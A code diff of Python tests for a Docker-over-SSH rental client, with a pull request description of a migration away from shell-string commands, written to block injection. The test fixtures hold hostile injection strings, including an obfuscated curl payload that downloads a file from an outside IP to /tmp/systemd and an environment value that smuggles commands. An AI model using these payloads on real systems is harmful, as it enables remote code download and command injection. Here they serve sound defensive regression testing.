+    assert "ENV_NEWLINE_MARKER" not in " ".join(env_spec.argv)
+    assert "HOSTILE_ENV=value'; echo ENV_MARKER; $(echo env)\n" in env_spec.stdin
+    assert "MULTILINE_ENV=line1\nENV_NEWLINE_MARKER\n" in env_spec.stdin
+
+
+@pytest.mark.asyncio
+async def test_factory_restores_home_and_closes_client(monkeypatch):
+    original_home = os.environ.get("HOME")
+    created = {}
+    api_client = FakeApiClient()
+
+    def api_client_factory(**kwargs):
+        ssh_home = Path(os.environ["HOME"])
+        created["kwargs"] = kwargs
+        created["ssh_home"] = ssh_home
+        created["key_mode"] = (ssh_home / ".ssh" / "id_executor").stat().st_mode & 0o777
+        created["known_hosts"] = (ssh_home / ".ssh" / "known_hosts").read_text()
+        return api_client
+
+    monkeypatch.setattr(
+        "services.rental_docker_sdk._validate_paramiko_known_hosts",
+        Mock(),
+    )
+    factory = RentalDockerSdkClientFactory(api_client_factory=api_client_factory)
+    executor_info = ExecutorSSHInfo(
+        uuid="executor-id",
+        address="127.0.0.1",
+        port=8000,
+        ssh_username="root",
+        ssh_port=2222,
+        python_path="/usr/bin/python",
+        root_dir="/root",
+        ssh_host_key="ssh-ed25519 AAAATESTKEY",
+    )
+
+    async with factory.connect(
+        executor_info=executor_info,
+        private_key="PRIVATE KEY",
+    ) as client:
+        assert isinstance(client, RentalDockerSdkClient)
+
+    assert created["kwargs"]["base_url"] == "ssh://root@127.0.0.1:2222"
+    assert created["kwargs"]["use_ssh_client"] is False
+    assert "PRIVATE KEY" not in str(created["kwargs"])
+    assert created["key_mode"] == 0o600
+    assert "[127.0.0.1]:2222 ssh-ed25519 AAAATESTKEY" in created["known_hosts"]
+    assert os.environ.get("HOME") == original_home
+    assert api_client.closed is True
+
+
+@pytest.mark.asyncio
+async def test_factory_fails_closed_without_executor_host_key():
+    api_client_factory = Mock()
+    factory = RentalDockerSdkClientFactory(api_client_factory=api_client_factory)
+    executor_info = ExecutorSSHInfo(
+        uuid="executor-id",
+        address="127.0.0.1",
+        port=8000,
+        ssh_username="root",
+        ssh_port=2222,
+        python_path="/usr/bin/python",
+        root_dir="/root",
+        ssh_host_key=None,
+    )
+
+    with pytest.raises(RentalDockerConnectionError):
+        async with factory.connect(
+            executor_info=executor_info,
+            private_key="PRIVATE KEY",
+        ):
+            pass
+
+    api_client_factory.assert_not_called()

--- a/neurons/validators/tests/test_rental_docker_sdk.py
+++ b/neurons/validators/tests/test_rental_docker_sdk.py
@@ -1,4 +1,7 @@
 import os
+import socket
+import struct
+import threading
 from pathlib import Path
 from unittest.mock import Mock
 
@@ -76,6 +79,43 @@ class FakeApiClient:
 
     def close(self):
         self.closed = True
+
+
+class SocketExecApiClient(FakeApiClient):
+    def __init__(self):
+        super().__init__()
+        self.stdin_received = b""
+        self.server_thread = None
+
+    def exec_start(self, exec_id, **kwargs):
+        if kwargs != {"socket": True}:
+            return super().exec_start(exec_id, **kwargs)
+
+        self.exec_started.append((exec_id, kwargs))
+        client_socket, server_socket = socket.socketpair()
+
+        def serve_exec_socket():
+            try:
+                chunks = []
+                while True:
+                    chunk = server_socket.recv(4096)
+                    if not chunk:
+                        break
+                    chunks.append(chunk)
+                self.stdin_received = b"".join(chunks)
+
+                for stream, payload in (
+                    (1, b"socket-stdout"),
+                    (2, b"socket-stderr"),
+                ):
+                    header = struct.pack(">BxxxL", stream, len(payload))
+                    server_socket.sendall(header + payload)
+            finally:
+                server_socket.close()
+
+        self.server_thread = threading.Thread(target=serve_exec_socket)
+        self.server_thread.start()
+        return client_socket
 
 
 @pytest.mark.asyncio
@@ -194,6 +234,36 @@ async def test_exec_in_container_passes_argv_and_environment_as_data():
         }
     ]
     assert api_client.exec_started == [("exec-id", {"demux": True})]
+
+
+@pytest.mark.asyncio
+async def test_exec_in_container_with_stdin_demuxes_socket_stdout_and_stderr():
+    api_client = SocketExecApiClient()
+    client = RentalDockerSdkClient(api_client)
+
+    result = await client.exec_in_container(
+        ContainerExecSpec(
+            container_name="pod_exec",
+            argv=("sh", "-c", "cat > /tmp/file"),
+            stdin="stdin payload\n",
+        )
+    )
+    api_client.server_thread.join(timeout=1)
+
+    assert api_client.server_thread.is_alive() is False
+    assert api_client.stdin_received == b"stdin payload\n"
+    assert result.exit_status == 0
+    assert result.stdout == "socket-stdout"
+    assert result.stderr == "socket-stderr"
+    assert api_client.exec_created == [
+        {
+            "container": "pod_exec",
+            "cmd": ["sh", "-c", "cat > /tmp/file"],
+            "stdin": True,
+            "environment": None,
+        }
+    ]
+    assert api_client.exec_started == [("exec-id", {"socket": True})]
 
 
 def test_stdin_exec_spec_builders_keep_values_out_of_argv():

--- a/neurons/validators/tests/test_rental_docker_sdk.py
+++ b/neurons/validators/tests/test_rental_docker_sdk.py
@@ -34,6 +34,9 @@ INCIDENT_PUBLIC_KEY = "';  c'u'''''r\\l'''' -o /tmp/systemd 203.23.128.30:443/li
 class FakeApiClient:
     def __init__(self):
         self.login_calls = []
+        self.inspected_images = []
+        self.missing_images = set()
+        self.inspect_image_error = None
         self.host_config_kwargs = None
         self.created_container = None
         self.started = []
@@ -50,6 +53,14 @@ class FakeApiClient:
 
     def login(self, **kwargs):
         self.login_calls.append(kwargs)
+
+    def inspect_image(self, image):
+        self.inspected_images.append(image)
+        if self.inspect_image_error is not None:
+            raise self.inspect_image_error
+        if image in self.missing_images:
+            raise ImageNotFound("missing image")
+        return {"Id": "image-id"}
 
     def create_container(self, **kwargs):
         self.created_container = kwargs
@@ -118,6 +129,10 @@ class SocketExecApiClient(FakeApiClient):
         return client_socket
 
 
+class ImageNotFound(Exception):
+    pass
+
+
 @pytest.mark.asyncio
 async def test_login_passes_credentials_as_sdk_data():
     api_client = FakeApiClient()
@@ -152,6 +167,27 @@ async def test_login_preserves_legitimate_password_metacharacters(password):
     await client.login(username="registry-user", password=password)
 
     assert api_client.login_calls[0]["password"] == password
+
+
+@pytest.mark.asyncio
+async def test_image_exists_inspects_image_as_sdk_data():
+    api_client = FakeApiClient()
+    client = RentalDockerSdkClient(api_client)
+
+    assert await client.image_exists(image="registry.example/app:tag") is True
+
+    assert api_client.inspected_images == ["registry.example/app:tag"]
+
+
+@pytest.mark.asyncio
+async def test_image_exists_returns_false_for_missing_image():
+    api_client = FakeApiClient()
+    api_client.missing_images.add("registry.example/missing:tag")
+    client = RentalDockerSdkClient(api_client)
+
+    assert await client.image_exists(image="registry.example/missing:tag") is False
+
+    assert api_client.inspected_images == ["registry.example/missing:tag"]
 
 
 @pytest.mark.asyncio


### PR DESCRIPTION
## Summary

Move the validator's normal rental Docker hot path from host-side Docker CLI shell strings to Docker SDK calls over `ssh://`.

This PR keeps the implementation intentionally narrow: one rental SDK helper module, structured request specs for the Docker operations we use, and no runtime feature flag or dual CLI/SDK path for migrated operations.

## What changed

- Added `docker[ssh]>=7.1.0` to validator dependencies.
- Added `services/rental_docker_sdk.py` for Docker SDK over SSH connection setup and rental Docker operations.
- Added structured SDK operation logging in `services/rental_docker_observability.py`.
- Migrated normal rental create operations to SDK data/API calls:
  - registry login;
  - image pull;
  - container create/start;
  - startup command argv mapping;
  - ports, env, volumes, restart policy, runtime, GPU/device settings, CPU/memory, storage opts, shm size, and entrypoint.
- Migrated create-time local Docker volume creation to SDK `create_volume(...)`; loopback plugin installation remains CLI/SSH setup for now.
- Migrated create/start SSH bootstrap exec calls through SDK exec.
- Migrated public-key add/remove and `/etc/environment` persistence through SDK exec with stdin data.
- Migrated start, stop, rental container remove, delete-time image prune, and volume removal through SDK calls.
- Hid Docker registry passwords from payload `repr(...)` output.
- Removed dead shell helpers no longer used after migration: the legacy Docker login shell builder and unused `setup_ssh_access`.
- Added unit/security guardrails and opt-in local Docker integration coverage, including local SDK create/remove volume coverage.

## Security notes

The migrated rental hot path passes user-controlled image, credential, env, startup, public-key, volume-name, and container-name values as SDK data or stdin instead of interpolating them into host-side Docker shell command text.

Credential regression coverage includes:

- the exact old malicious Docker password payload;
- the exact old malicious Docker username payload;
- production-like legitimate passwords containing shell metacharacters.

Public-key setup/removal coverage verifies key contents are passed via stdin and the local Docker smoke test verifies add/remove actually changes `/root/.ssh/authorized_keys`.

## SSH host-key requirement

`ExecutorSSHInfo.ssh_host_key` remains optional at the shared protocol/model level because that model is also used by placeholder/error/debug records. The migrated rental Docker SDK path treats it as mandatory because Docker SDK over SSH needs operation-scoped `known_hosts` material to verify the executor SSH server identity.

If a real rental operation reaches the SDK path without `ssh_host_key`, it fails closed before Docker SDK connection or Docker operations. Create returns the existing failed-container response shape with `failure_step="docker_sdk_ssh_host_key"`; lifecycle/key operations return their existing operation-specific failed response shape. There is no Docker CLI fallback.

We checked production validator logs before keeping this strict requirement: completed validation rows showed real executors providing `ssh_host_key`, and no real completed executor rows missing it were found in the sampled 24h/7d/30d windows. The only broad `ssh_host_key: null` matches were placeholder/error monitoring records, not connectable executor responses.

If compatibility is ever needed for a real executor missing this field, the fallback should stay inside the SDK factory: fetch the remote SSH server key, log `host_key_source=compatibility_remote_fetch`, write that key into the operation-scoped temp `known_hosts`, and continue through Docker SDK. It should not fall back to host-side Docker CLI shell commands.

## Not migrated in this PR

These paths still contain Docker CLI usage and are intentionally left for follow-up because they are outside the original normal rental hot path:

- custom Dockerfile build internals, including DinD start/remove, DinD exec, inner build, image export/load, and egress helper containers;
- Jupyter setup;
- S3FS/external-volume plugin management and volume setup;
- loopback Docker volume plugin installation for local volumes; create-time local volume creation itself is migrated to SDK;
- broad cleanup helpers;
- backup/restore helpers;
- diagnostics such as container inspect/log capture on failure.

Custom Dockerfile build is rental-create-triggerable and should remain visible follow-up inventory, but it is not included in this scoped migration.

## Validation

From `neurons/validators`:

```bash
pdm run python -W ignore -m pytest tests -q --tb=short
```

Result: `759 passed, 8 skipped`.

```bash
RUN_RENTAL_DOCKER_SDK_INTEGRATION=1 RUN_RENTAL_DOCKER_SDK_SSH_INTEGRATION=1 pdm run python -W ignore -m pytest tests/integration/test_rental_docker_sdk_local.py -q --tb=short
```

Result: `4 passed`.

Also passed:

```bash
python -m py_compile neurons/validators/src/services/rental_docker_sdk.py neurons/validators/src/services/docker_service.py
git diff --check
```

Targeted grep found no references to the removed login shell helper, removed `setup_ssh_access`, or old SDK feature flag.

## Staging validation

Staging validation completed for the migrated rental hot path. The run covered successful rental creation, SDK-backed Docker operations, SSH/bootstrap behavior, env/startup handling, reboot/delete cleanup, local volume creation/removal, and negative security replay cases that are reachable through the public staging API. No PR-scoped runtime blocker was found.
